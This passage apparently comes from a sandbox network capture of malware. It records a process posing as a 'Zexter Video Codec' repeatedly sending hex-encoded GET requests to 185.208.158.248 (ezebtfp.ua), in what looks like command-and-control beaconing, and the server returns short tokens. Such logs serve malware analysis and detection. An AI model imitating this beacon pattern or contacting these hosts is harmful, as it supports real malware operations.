                                                                                                    Oct 3, 2024 08:40:08.954951048 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:09.645920992 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:09 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    9 | 192.168.2.5 | 49723 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Oct 3, 2024 08:40:09.767479897 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:10.454655886 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:10 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    10 | 192.168.2.5 | 49724 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Oct 3, 2024 08:40:10.579782963 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:11.274789095 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:11 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:11.387032986 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:11.624023914 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:11 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:11.730504990 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:11.967400074 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:11 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:12.082320929 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:12.328104973 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:12 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    11 | 192.168.2.5 | 49725 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Oct 3, 2024 08:40:12.455183029 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:13.668616056 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:13 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:13.668803930 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:13 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:13.668948889 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:13 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:13.778165102 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:14.019181013 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:13 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    12 | 192.168.2.5 | 49726 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Oct 3, 2024 08:40:14.143680096 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:14.838619947 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:14 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    13 | 192.168.2.5 | 49727 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Oct 3, 2024 08:40:14.970506907 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:15.663813114 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:15 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    14 | 192.168.2.5 | 49728 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Oct 3, 2024 08:40:15.783762932 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:16.468743086 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:16 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    15 | 192.168.2.5 | 49729 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Oct 3, 2024 08:40:16.595844984 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:17.286511898 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:17 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


Session ID: 16 | Source IP: 192.168.2.5 | Source Port: 49730 | Destination IP: 185.208.158.248 | Destination Port: 80 | PID: 1216 | Process: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe

Timestamp: Oct 3, 2024 08:40:17.408485889 CEST | Bytes transferred: 321 | Direction: OUT
GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
Host: ezebtfp.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 3, 2024 08:40:18.087939978 CEST | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Timestamp: Oct 3, 2024 08:40:18.199320078 CEST | Bytes transferred: 321 | Direction: OUT
GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
Host: ezebtfp.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 3, 2024 08:40:18.438894033 CEST | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 17 | Source IP: 192.168.2.5 | Source Port: 49731 | Destination IP: 185.208.158.248 | Destination Port: 80 | PID: 1216 | Process: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe

Timestamp: Oct 3, 2024 08:40:18.564563990 CEST | Bytes transferred: 321 | Direction: OUT
GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
Host: ezebtfp.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 3, 2024 08:40:19.251231909 CEST | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 18 | Source IP: 192.168.2.5 | Source Port: 49732 | Destination IP: 185.208.158.248 | Destination Port: 80 | PID: 1216 | Process: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe

Timestamp: Oct 3, 2024 08:40:19.377352953 CEST | Bytes transferred: 321 | Direction: OUT
GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
Host: ezebtfp.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 3, 2024 08:40:20.057390928 CEST | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Timestamp: Oct 3, 2024 08:40:20.168422937 CEST | Bytes transferred: 321 | Direction: OUT
GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
Host: ezebtfp.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 3, 2024 08:40:20.409823895 CEST | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 19 | Source IP: 192.168.2.5 | Source Port: 49733 | Destination IP: 185.208.158.248 | Destination Port: 80 | PID: 1216 | Process: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe

Timestamp: Oct 3, 2024 08:40:20.536375999 CEST | Bytes transferred: 321 | Direction: OUT
GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
Host: ezebtfp.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 3, 2024 08:40:21.226202011 CEST | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 20 | Source IP: 192.168.2.5 | Source Port: 49734 | Destination IP: 185.208.158.248 | Destination Port: 80 | PID: 1216 | Process: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe

Timestamp: Oct 3, 2024 08:40:21.346004009 CEST | Bytes transferred: 321 | Direction: OUT
GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
Host: ezebtfp.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 3, 2024 08:40:22.025324106 CEST | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Timestamp: Oct 3, 2024 08:40:22.137379885 CEST | Bytes transferred: 321 | Direction: OUT
GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
Host: ezebtfp.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 3, 2024 08:40:22.376693010 CEST | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 21 | Source IP: 192.168.2.5 | Source Port: 49735 | Destination IP: 185.208.158.248 | Destination Port: 80 | PID: 1216 | Process: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe

Timestamp: Oct 3, 2024 08:40:22.502600908 CEST | Bytes transferred: 321 | Direction: OUT
GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
Host: ezebtfp.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 3, 2024 08:40:23.198024035 CEST | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Timestamp: Oct 3, 2024 08:40:23.308926105 CEST | Bytes transferred: 321 | Direction: OUT
GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
Host: ezebtfp.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 3, 2024 08:40:23.545742035 CEST | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Timestamp: Oct 3, 2024 08:40:23.653604984 CEST | Bytes transferred: 321 | Direction: OUT
GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
Host: ezebtfp.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 3, 2024 08:40:23.890561104 CEST | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 22 | Source IP: 192.168.2.5 | Source Port: 49736 | Destination IP: 185.208.158.248 | Destination Port: 80 | PID: 1216 | Process: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe

Timestamp: Oct 3, 2024 08:40:24.018596888 CEST | Bytes transferred: 321 | Direction: OUT
GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
Host: ezebtfp.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 3, 2024 08:40:24.748857021 CEST | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:24 GMT
